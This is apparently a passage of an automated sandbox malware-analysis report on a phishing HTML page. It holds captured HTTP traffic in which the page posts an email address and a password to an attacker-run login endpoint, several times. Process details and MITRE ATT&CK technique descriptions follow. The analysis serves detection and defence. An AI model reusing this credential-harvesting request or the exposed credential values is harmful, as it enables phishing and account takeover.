2025-02-25 01:20:06 UTC	1371	IN	Data Raw: e9 af 37 3e 22 6c 01 c6 4e 01 12 e1 7d c1 60 70 7a 57 57 97 b4 70 95 0b 33 51 0d 96 02 49 8f 5e 65 e6 25 00 d6 15 8a 18 0c 06 df 41 44 ef c9 75 27 42 a1 2f c7 69 d9 aa a3 c1 91 75 b3 b2 1a 77 15 d2 e7 44 21 63 e3 34 b7 cd 4c af 95 93 97 3b 3d e3 63 11 10 91 f6 c5 5c 37 66 fc c1 b2 ac 79 a6 69 ce cb 3a 49 47 fc 75 5d bf 14 40 91 be 75 35 e0 fb 84 10 05 c7 d7 90 5d 08 a4 eb d2 ad 3a 1b 8a 4f b9 f2 a0 5b 35 3e 66 ea 22 c2 82 5c 0f 5d d7 bf 0a c0 51 a8 69 9a 2d cc f8 1b 51 7e 6b 61 60 60 cf fe eb d6 ad ab d7 65 68 4f c9 9d e9 0b ed ed ed 77 f4 f4 f4 f4 3a 45 d4 75 5d ba 70 89 d9 f9 98 6c 22 da 29 5f ce a4 1d 59 40 e3 09 32 47 cb b2 a4 f7 b5 55 06 fd 87 dc dd 72 f8 9c 8a e1 66 1d 00 ff a3 bc b4 ab 47 38 1c 5e ca 8c 59 b9 ee 44 98 0f 50 b4 78 0a 74 7e 47 47 c7 Data Ascii: 7>"lN}`pzWWp3QI^e%ADu'B/iuwD!c4L;=c\7fyi:IGu]@u5]:O[5>f"\]Qi-Q~ka``ehOw:Eu]pl")_Y@2GUrfG8^YDPxt~GG
2025-02-25 01:20:06 UTC	95	IN	Data Raw: 4b b7 97 77 74 74 cc 4c a5 52 3f c9 f7 e1 bc 01 38 19 42 88 87 4c d3 8c e4 0f 6c 51 c1 c1 59 66 7c 57 72 26 a0 54 63 2c 16 5d 66 9a 66 22 b7 ac 11 01 93 26 4d 3a 56 b6 79 0b 99 59 80 de 0a 3e af 51 69 14 e6 ff 02 00 00 ff ff 5a 98 a3 a9 0f 7b c2 43 00 00 00 00 49 45 4e 44 ae 42 60 82 Data Ascii: KwttLR?8BLlQYf\|Wr&Tc,]ff"&M:VyY>QiZ{CIENDB`

Timestamp	Bytes transferred	Direction	Data
2025-02-25 01:20:26 UTC	640	OUT	POST /xtk/xls/login.php HTTP/1.1 Host: pxvbtech.store Connection: keep-alive Content-Length: 58 sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Accept: application/json, text/javascript, /; q=0.01 sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24" Content-Type: application/x-www-form-urlencoded; charset=UTF-8 sec-ch-ua-mobile: ?0 Origin: null Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-02-25 01:20:26 UTC	58	OUT	Data Raw: 61 69 3d 6f 66 66 73 68 6f 72 65 72 65 6e 65 77 61 62 6c 65 73 25 34 30 6e 6f 70 73 65 6d 61 2e 67 6f 76 2e 61 75 26 70 72 3d 25 32 36 4d 5a 33 51 21 75 25 32 43 4d 61 6f 54 Data Ascii: ai=offshorerenewables%40nopsema.gov.au&pr=%26MZ3Q!u%2CMaoT
2025-02-25 01:20:35 UTC	570	IN	HTTP/1.1 200 OK keep-alive: timeout=5, max=100 x-powered-by: PHP/8.1.31 set-cookie: PHPSESSID=agdlomu070nost5islpn9u92oj; path=/; secure expires: Thu, 19 Nov 1981 08:52:00 GMT cache-control: no-store, no-cache, must-revalidate pragma: no-cache access-control-allow-origin: * access-control-allow-methods: POST, GET, OPTIONS access-control-allow-headers: Content-Type, Authorization, X-Requested-With content-type: application/json content-length: 49 date: Tue, 25 Feb 2025 01:20:35 GMT server: LiteSpeed x-turbo-charged-by: LiteSpeed connection: close
2025-02-25 01:20:35 UTC	49	IN	Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 65 72 72 6f 72 22 2c 22 6d 65 73 73 61 67 65 22 3a 22 49 6e 63 6f 72 72 65 63 74 20 70 61 73 73 77 6f 72 64 22 7d Data Ascii: {"status":"error","message":"Incorrect password"}

Timestamp	Bytes transferred	Direction	Data
2025-02-25 01:20:36 UTC	361	OUT	GET /xtk/xls/login.php HTTP/1.1 Host: pxvbtech.store Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-02-25 01:20:37 UTC	570	IN	HTTP/1.1 200 OK keep-alive: timeout=5, max=100 x-powered-by: PHP/8.1.31 set-cookie: PHPSESSID=p6lhn72dengna2mli0cmeele5p; path=/; secure expires: Thu, 19 Nov 1981 08:52:00 GMT cache-control: no-store, no-cache, must-revalidate pragma: no-cache access-control-allow-origin: * access-control-allow-methods: POST, GET, OPTIONS access-control-allow-headers: Content-Type, Authorization, X-Requested-With content-type: application/json content-length: 63 date: Tue, 25 Feb 2025 01:20:37 GMT server: LiteSpeed x-turbo-charged-by: LiteSpeed connection: close
2025-02-25 01:20:37 UTC	63	IN	Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 65 72 72 6f 72 22 2c 22 6d 65 73 73 61 67 65 22 3a 22 45 6d 61 69 6c 20 61 6e 64 20 70 61 73 73 77 6f 72 64 20 61 72 65 20 72 65 71 75 69 72 65 64 2e 22 7d Data Ascii: {"status":"error","message":"Email and password are required."}

Timestamp	Bytes transferred	Direction	Data
2025-02-25 01:20:49 UTC	640	OUT	POST /xtk/xls/login.php HTTP/1.1 Host: pxvbtech.store Connection: keep-alive Content-Length: 58 sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Accept: application/json, text/javascript, /; q=0.01 sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24" Content-Type: application/x-www-form-urlencoded; charset=UTF-8 sec-ch-ua-mobile: ?0 Origin: null Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-02-25 01:20:49 UTC	58	OUT	Data Raw: 61 69 3d 6f 66 66 73 68 6f 72 65 72 65 6e 65 77 61 62 6c 65 73 25 34 30 6e 6f 70 73 65 6d 61 2e 67 6f 76 2e 61 75 26 70 72 3d 25 32 36 4d 5a 33 51 21 75 25 32 43 4d 61 6f 54 Data Ascii: ai=offshorerenewables%40nopsema.gov.au&pr=%26MZ3Q!u%2CMaoT
2025-02-25 01:21:01 UTC	570	IN	HTTP/1.1 200 OK keep-alive: timeout=5, max=100 x-powered-by: PHP/8.1.31 set-cookie: PHPSESSID=n1lab6ppb9h2h5e3dvib29kso4; path=/; secure expires: Thu, 19 Nov 1981 08:52:00 GMT cache-control: no-store, no-cache, must-revalidate pragma: no-cache access-control-allow-origin: * access-control-allow-methods: POST, GET, OPTIONS access-control-allow-headers: Content-Type, Authorization, X-Requested-With content-type: application/json content-length: 49 date: Tue, 25 Feb 2025 01:21:00 GMT server: LiteSpeed x-turbo-charged-by: LiteSpeed connection: close
2025-02-25 01:21:01 UTC	49	IN	Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 65 72 72 6f 72 22 2c 22 6d 65 73 73 61 67 65 22 3a 22 49 6e 63 6f 72 72 65 63 74 20 70 61 73 73 77 6f 72 64 22 7d Data Ascii: {"status":"error","message":"Incorrect password"}

Timestamp	Bytes transferred	Direction	Data
2025-02-25 01:21:01 UTC	407	OUT	GET /xtk/xls/login.php HTTP/1.1 Host: pxvbtech.store Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=p6lhn72dengna2mli0cmeele5p
2025-02-25 01:21:02 UTC	504	IN	HTTP/1.1 200 OK keep-alive: timeout=5, max=100 x-powered-by: PHP/8.1.31 expires: Thu, 19 Nov 1981 08:52:00 GMT cache-control: no-store, no-cache, must-revalidate pragma: no-cache access-control-allow-origin: * access-control-allow-methods: POST, GET, OPTIONS access-control-allow-headers: Content-Type, Authorization, X-Requested-With content-type: application/json content-length: 63 date: Tue, 25 Feb 2025 01:21:02 GMT server: LiteSpeed x-turbo-charged-by: LiteSpeed connection: close
2025-02-25 01:21:02 UTC	63	IN	Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 65 72 72 6f 72 22 2c 22 6d 65 73 73 61 67 65 22 3a 22 45 6d 61 69 6c 20 61 6e 64 20 70 61 73 73 77 6f 72 64 20 61 72 65 20 72 65 71 75 69 72 65 64 2e 22 7d Data Ascii: {"status":"error","message":"Email and password are required."}

Timestamp	Bytes transferred	Direction	Data
2025-02-25 01:21:13 UTC	640	OUT	POST /xtk/xls/login.php HTTP/1.1 Host: pxvbtech.store Connection: keep-alive Content-Length: 58 sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Accept: application/json, text/javascript, /; q=0.01 sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24" Content-Type: application/x-www-form-urlencoded; charset=UTF-8 sec-ch-ua-mobile: ?0 Origin: null Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-02-25 01:21:13 UTC	58	OUT	Data Raw: 61 69 3d 6f 66 66 73 68 6f 72 65 72 65 6e 65 77 61 62 6c 65 73 25 34 30 6e 6f 70 73 65 6d 61 2e 67 6f 76 2e 61 75 26 70 72 3d 25 32 36 4d 5a 33 51 21 75 25 32 43 4d 61 6f 54 Data Ascii: ai=offshorerenewables%40nopsema.gov.au&pr=%26MZ3Q!u%2CMaoT
2025-02-25 01:21:23 UTC	570	IN	HTTP/1.1 200 OK keep-alive: timeout=5, max=100 x-powered-by: PHP/8.1.31 set-cookie: PHPSESSID=7g184fpcvnlamr720nt1p994el; path=/; secure expires: Thu, 19 Nov 1981 08:52:00 GMT cache-control: no-store, no-cache, must-revalidate pragma: no-cache access-control-allow-origin: * access-control-allow-methods: POST, GET, OPTIONS access-control-allow-headers: Content-Type, Authorization, X-Requested-With content-type: application/json content-length: 49 date: Tue, 25 Feb 2025 01:21:23 GMT server: LiteSpeed x-turbo-charged-by: LiteSpeed connection: close
2025-02-25 01:21:23 UTC	49	IN	Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 65 72 72 6f 72 22 2c 22 6d 65 73 73 61 67 65 22 3a 22 49 6e 63 6f 72 72 65 63 74 20 70 61 73 73 77 6f 72 64 22 7d Data Ascii: {"status":"error","message":"Incorrect password"}

Timestamp	Bytes transferred	Direction	Data
2025-02-25 01:21:24 UTC	407	OUT	GET /xtk/xls/login.php HTTP/1.1 Host: pxvbtech.store Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=p6lhn72dengna2mli0cmeele5p
2025-02-25 01:21:25 UTC	504	IN	HTTP/1.1 200 OK keep-alive: timeout=5, max=100 x-powered-by: PHP/8.1.31 expires: Thu, 19 Nov 1981 08:52:00 GMT cache-control: no-store, no-cache, must-revalidate pragma: no-cache access-control-allow-origin: * access-control-allow-methods: POST, GET, OPTIONS access-control-allow-headers: Content-Type, Authorization, X-Requested-With content-type: application/json content-length: 63 date: Tue, 25 Feb 2025 01:21:25 GMT server: LiteSpeed x-turbo-charged-by: LiteSpeed connection: close
2025-02-25 01:21:25 UTC	63	IN	Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 65 72 72 6f 72 22 2c 22 6d 65 73 73 61 67 65 22 3a 22 45 6d 61 69 6c 20 61 6e 64 20 70 61 73 73 77 6f 72 64 20 61 72 65 20 72 65 71 75 69 72 65 64 2e 22 7d Data Ascii: {"status":"error","message":"Email and password are required."}

Target ID:	0
Start time:	20:19:55
Start date:	24/02/2025
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "C:\Users\user\Desktop\Play_VM-Now_offshorerenewablesVWAV.htm"
Imagebase:	0x7ff6b0b40000
File size:	3'001'952 bytes
MD5 hash:	290DF23002E9B52249B5549F0C668A86
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	false

Target ID:	5
Start time:	20:20:12
Start date:	24/02/2025
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --string-annotations=is-enterprise-managed=no --field-trial-handle=5124,i,17513973682476257831,12935232604443765362,262144 --variations-seed-version=20250129-180207.876000 --mojo-platform-channel-handle=6008 /prefetch:12
Imagebase:	0x7ff6b0b40000
File size:	3'001'952 bytes
MD5 hash:	290DF23002E9B52249B5549F0C668A86
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	false

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Play_VM-Now_offshorerenewablesVWAV.htm

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

HTML

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Phishing

Networking

System Summary

Stealing of Sensitive Information

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Chrome Cache Entry: 69

Chrome Cache Entry: 70

Chrome Cache Entry: 71

Chrome Cache Entry: 72

Chrome Cache Entry: 73

Chrome Cache Entry: 74

Chrome Cache Entry: 75

Chrome Cache Entry: 76

Chrome Cache Entry: 77

Chrome Cache Entry: 78

Chrome Cache Entry: 79

Chrome Cache Entry: 80

Chrome Cache Entry: 81

Chrome Cache Entry: 82

Chrome Cache Entry: 83

Chrome Cache Entry: 84

Chrome Cache Entry: 85

Static File Info

General

Network Behavior

Suricata IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

ICMP Packets

DNS Queries

DNS Answers

Windows Analysis Report
Play_VM-Now_offshorerenewablesVWAV.htm

Target ID:	14
Start time:	20:21:55
Start date:	24/02/2025
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=on_device_model.mojom.OnDeviceModelService --lang=en-US --service-sandbox-type=on_device_model_execution --string-annotations=is-enterprise-managed=no --field-trial-handle=4308,i,17513973682476257831,12935232604443765362,262144 --variations-seed-version=20250129-180207.876000 --mojo-platform-channel-handle=1652 /prefetch:14
Imagebase:	0x7ff6b0b40000
File size:	3'001'952 bytes
MD5 hash:	290DF23002E9B52249B5549F0C668A86
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre